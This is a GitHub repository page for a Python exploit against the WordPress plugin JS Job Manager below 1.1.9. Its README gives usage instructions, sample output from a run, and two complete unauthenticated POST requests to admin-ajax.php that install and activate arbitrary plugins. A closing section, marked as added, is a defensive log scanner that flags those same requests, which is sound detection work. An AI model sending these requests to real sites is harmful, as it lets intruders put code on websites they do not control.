https://github.com/randomrobbiebf/js-jobs
JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation
Last synced: about 1 year ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/js-jobs
- Owner: RandomRobbieBF
- License: apache-2.0
- Created: 2023-07-21T08:41:30.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-07-21T08:54:01.000Z (almost 3 years ago)
- Last Synced: 2025-01-21T05:41:44.117Z (over 1 year ago)
- Language: Python
- Size: 7.81 KB
- Stars: 0
- Watchers: 2
- Forks: 1
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# js-jobs
JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation
# Description
The `jsjobs_ajax` AJAX action of the plugin, which is available to both authenticated and unauthenticated users, does not have proper authorisation and CSRF checks, in particular when using the `installPluginFromAjax` and `activatePluginFromAjax` tasks. This could allow unauthenticated attackers to install arbitrary plugins from the WordPress repository and activate them (with some limitations).
There is no control over the version of the plugin, so it will install the latest version of the plugin.
How to use
---
```
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s
```
Example
---
```
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.
```
Proof of Concept
---
To install a plugin:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=
```
To activate a plugin (there is a limitation here, as the plugin must have the /.php file, otherwise it won't be activated):
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=
```
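A defender-side check for the two requests shown above, as an added example that is not part of the original repository: it flags logged POST requests to `admin-ajax.php` that call the `jsjobs_ajax` action with either task named in the description, and notes whether a WordPress login cookie was present. The record layout (method, target, lower-cased headers, form body, as a WAF or reverse proxy with body logging might export), the function names and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Task names are taken from the advisory text above.
RISKY_TASKS = {"installPluginFromAjax", "activatePluginFromAjax"}

# Constructed sample records: (method, request target, headers, form body).
SAMPLE = [
    ("POST", "/wp-admin/admin-ajax.php", {},
     "action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=example-plugin"),
    ("POST", "/wp-admin/admin-ajax.php", {"cookie": "wordpress_logged_in_x=editor"},
     "action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=example-plugin"),
    ("POST", "/wp-admin/admin-ajax.php", {}, "action=heartbeat&interval=60"),
    ("POST", "/index.php", {}, "action=jsjobs_ajax&task=installPluginFromAjax"),
]

def flag_request(method, target, headers, body):
    """Return a finding dict for a risky jsjobs_ajax call, otherwise None."""
    if method.upper() != "POST":
        return None
    if not urlsplit(target).path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if "jsjobs_ajax" not in params.get("action", []):
        return None
    tasks = RISKY_TASKS.intersection(params.get("task", []))
    if not tasks:
        return None
    # Assumption: header names are lower-cased by the log exporter.
    cookie = headers.get("cookie", "")
    return {
        "tasks": sorted(tasks),
        "pluginslug": params.get("pluginslug", [""])[0],
        # WordPress login cookies start with this prefix; absence means no session.
        "unauthenticated": "wordpress_logged_in_" not in cookie,
    }

def scan(records):
    """Apply flag_request to every record and keep the findings."""
    findings = (flag_request(*r) for r in records)
    return [f for f in findings if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings with `unauthenticated` set to true on a site running JS Job Manager below 1.1.9 are the ones to triage first, alongside a review of the installed plugin list for the reported slug.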